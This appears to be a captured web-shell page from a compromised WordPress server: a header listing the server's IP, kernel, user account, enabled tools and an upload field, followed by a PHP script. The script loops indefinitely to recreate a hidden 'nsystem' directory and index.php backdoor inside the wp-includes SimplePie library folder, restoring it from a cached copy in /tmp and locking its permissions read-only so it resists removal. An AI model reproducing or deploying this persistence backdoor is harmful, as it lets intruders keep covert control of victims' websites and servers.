Server IP : 158.178.228.73 / Your IP : 80.80.80.153 Web Server : Apache/2.4.37 (Oracle Linux Server) OpenSSL/1.1.1k System : Linux ust-wp1-prod 5.15.0-308.179.6.el8uek.x86_64 #2 SMP Wed Apr 23 10:46:57 PDT 2025 x86_64 User : tomasFtp ( 1007) PHP Version : 8.4.8 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/thread-self/root/proc/self/root/proc/1067951/fd/ |
Upload File : |
<?php @ini_set("max_execution_time", 0); while (True){ if (!file_exists("/home/tomas/public_html/wp-includes/SimplePie/library/SimplePie/Net/nsystem")){ mkdir("/home/tomas/public_html/wp-includes/SimplePie/library/SimplePie/Net/nsystem"); } if (!file_exists("/home/tomas/public_html/wp-includes/SimplePie/library/SimplePie/Net/nsystem/index.php")){ $text = base64_encode(file_get_contents("/tmp/.sessions/.L2hvbWUvdG9tYXMvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvU2ltcGxlUGllL2xpYnJhcnkvU2ltcGxlUGllL05ldC9uc3lzdGVtaW5kZXgtdGV4dA==")); file_put_contents("/home/tomas/public_html/wp-includes/SimplePie/library/SimplePie/Net/nsystem/index.php", base64_decode($text)); } if (gecko_perm("/home/tomas/public_html/wp-includes/SimplePie/library/SimplePie/Net/nsystem/index.php") != 0444){ chmod("/home/tomas/public_html/wp-includes/SimplePie/library/SimplePie/Net/nsystem/index.php", 0444); } if (gecko_perm("/home/tomas/public_html/wp-includes/SimplePie/library/SimplePie/Net/nsystem") != 0555){ chmod("/home/tomas/public_html/wp-includes/SimplePie/library/SimplePie/Net/nsystem", 0555); } } function gecko_perm($flename){ return substr(sprintf("%o", fileperms($flename)), -4); }